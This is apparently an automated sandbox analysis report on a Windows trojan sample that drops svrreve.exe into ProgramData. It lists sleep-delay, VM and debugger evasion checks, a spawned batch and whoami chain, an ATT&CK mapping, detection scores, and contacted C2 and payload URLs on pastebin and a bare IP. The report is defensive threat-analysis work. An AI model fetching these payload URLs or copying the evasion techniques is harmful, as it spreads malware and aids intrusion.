                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595641s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595531s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595422s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595313s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595203s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595090s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594977s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594787s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594625s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594511s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594406s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594297s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594187s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594078s >= -30000sJump to behavior
                          Source: C:\Windows\System32\timeout.exe TID: 7624Thread sleep count: 51 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599672Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599445Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599342Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599085Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598914Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598809Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598702Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598594Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598469Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596172Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596054Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595918Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595812Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595579Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595454Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595329Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594061Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 593954Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599094Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598984Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598766Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598188Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598067Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597942Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597789Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597684Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597390Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597281Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597172Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597062Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596953Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596734Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595859Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595750Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595641Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595531Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595422Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595203Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595090Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594977Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594787Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594511Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594078Jump to behavior
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drBinary or memory string: Hyper-V
                          Source: Amcache.hve.17.drBinary or memory string: VMware
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859462067.00000258F2C9C000.00000004.00000020.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859941391.00000258F5105000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859941391.00000258F5105000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\_l
                          Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 2_2_00007FFD9BA11312 CheckRemoteDebuggerPresent,2_2_00007FFD9BA11312
                          Source: C:\ProgramData\uovan\svrreve.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\whoami.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeQueries volume information: C:\Users\user\Desktop\ubes6SC7Vd.exe VolumeInformationJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeQueries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeQueries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformationJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeQueries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts2
                          Command and Scripting Interpreter                          		1
                          Scripting                          		11
                          Process Injection                          		1
                          Masquerading                          		OS Credential Dumping221
                          Security Software Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Disable or Modify Tools                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		41
                          Virtualization/Sandbox Evasion                          		Security Account Manager41
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Ingress Tool Transfer                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                          Obfuscated Files or Information                          		LSA Secrets1
                          File and Directory Discovery                          		SSHKeylogging4
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Software Packing                          		Cached Domain Credentials113
                          System Information Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Timestomp                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1462351 Sample: ubes6SC7Vd.exe Startdate: 25/06/2024 Architecture: WINDOWS Score: 100 44 pastebin.com 2->44 46 ipwhois.app 2->46 60 Antivirus / Scanner detection for submitted sample 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 .NET source code contains potential unpacker 2->64 68 4 other signatures 2->68 8 ubes6SC7Vd.exe 14 9 2->8         started        12 svrreve.exe 2->12         started        14 svrreve.exe 2->14         started        signatures3 66 Connects to a pastebin service (likely for C&C) 44->66 process4 dnsIp5 48 ipwhois.app 195.201.57.90, 443, 49731, 49732 HETZNER-ASDE Germany 8->48 34 C:\ProgramData\uovan\svrreve.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\...\ubes6SC7Vd.exe.log, CSV 8->36 dropped 38 C:\...\svrreve.exe:Zone.Identifier, ASCII 8->38 dropped 16 svrreve.exe 15 2 8->16         started        20 cmd.exe 1 8->20         started        22 WerFault.exe 21 12->22         started        24 WerFault.exe 21 14->24         started        file6 process7 dnsIp8 40 pastebin.com 172.67.19.24, 443, 49755 CLOUDFLARENETUS United States 16->40 42 172.86.105.109, 49759, 80 PONYNETUS United States 16->42 50 Antivirus detection for dropped file 16->50 52 Multi AV Scanner detection for dropped file 16->52 54 Machine Learning detection for dropped file 16->54 56 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 16->56 26 WerFault.exe 16->26         started        58 Uses whoami command line tool to query computer and username 20->58 28 conhost.exe 20->28         started        30 timeout.exe 1 20->30         started        32 whoami.exe 1 20->32         started        signatures9 process10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          ubes6SC7Vd.exe56%VirustotalBrowse
                          ubes6SC7Vd.exe45%ReversingLabsWin32.Trojan.Generic
                          ubes6SC7Vd.exe100%AviraTR/Spy.Gen8
                          ubes6SC7Vd.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\uovan\svrreve.exe100%AviraTR/Spy.Gen8
                          C:\ProgramData\uovan\svrreve.exe100%Joe Sandbox ML
                          C:\ProgramData\uovan\svrreve.exe45%ReversingLabsWin32.Trojan.Generic
                          C:\ProgramData\uovan\svrreve.exe56%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          ipwhois.app0%VirustotalBrowse
                          pastebin.com0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://upx.sf.net0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          http://ipwhois.app0%Avira URL Cloudsafe
                          https://pastebin.com/raw/fR7B5m9EP0%Avira URL Cloudsafe
                          https://pastebin.com/raw/fR7B5m9E0%Avira URL Cloudsafe
                          https://github.com/clap-rs/clap/issuesC:0%Avira URL Cloudsafe
                          https://ipwhois.app/xml/0%Avira URL Cloudsafe
                          https://pastebin.com/raw/fR7B5m9EX0%Avira URL Cloudsafe
                          http://172.86.105.1090%Avira URL Cloudsafe
                          https://ipwhois.app/xml/0%VirustotalBrowse
                          http://ipwhois.app0%VirustotalBrowse
                          https://pastebin.com/raw/fR7B5m9EP1%VirustotalBrowse
                          https://github.com/clap-rs/clap/issuesC:0%VirustotalBrowse
                          http://ipwhois.app/xml/0%Avira URL Cloudsafe
                          https://pastebin.com/raw/fR7B5m9E2%VirustotalBrowse
                          http://172.86.105.109(f0%Avira URL Cloudsafe
                          http://172.86.105.109/ups/ddttd.exe0%Avira URL Cloudsafe
                          http://172.86.105.1091%VirustotalBrowse
                          https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc0%Avira URL Cloudsafe
                          http://ipwhois.app/xml/0%VirustotalBrowse
                          http://172.86.105.109/hook/upgrade.php20%Avira URL Cloudsafe
                          http://172.86.105.109/hook/upgrade.php0%Avira URL Cloudsafe
                          http://172.86.105.109/ups/ddttd.exe1%VirustotalBrowse
                          https://github.com/clap-rs/clap/issues0%Avira URL Cloudsafe
                          http://172.86.105.109/ups/Snup.bat0%Avira URL Cloudsafe
                          https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc0%VirustotalBrowse
                          http://pastebin.com0%Avira URL Cloudsafe
                          http://172.86.105.109/hook/upgrade.php1%VirustotalBrowse
                          https://github.com/clap-rs/clap/issues0%VirustotalBrowse
                          https://pastebin.com0%Avira URL Cloudsafe
                          https://pastebin.com/raw/fR7B5m9EX1%VirustotalBrowse
                          https://cdn.ipwhois.io/flags/us.svg0%Avira URL Cloudsafe
                          http://172.86.105.109/ups/Snup.bat1%VirustotalBrowse
                          https://docs.rs/getrandom#nodejs-es-module-supportCalling0%Avira URL Cloudsafe
                          https://ipwhois.app0%Avira URL Cloudsafe
                          https://pastebin.com0%VirustotalBrowse
                          http://pastebin.com0%VirustotalBrowse
                          https://cdn.ipwhois.io/flags/us.svg0%VirustotalBrowse
                          https://docs.rs/getrandom#nodejs-es-module-supportCalling0%VirustotalBrowse
                          https://ipwhois.app0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          ipwhois.app
                          		195.201.57.90
                          		truefalseunknown
                          pastebin.com
                          		172.67.19.24
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://ipwhois.app/xml/false
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.com/raw/fR7B5m9Efalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ipwhois.app/xml/false
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.86.105.109/hook/upgrade.phpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://ipwhois.appubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258800B0000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F49000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FCF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E50000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FA6000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/clap-rs/clap/issuesC:svrreve.exe.0.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
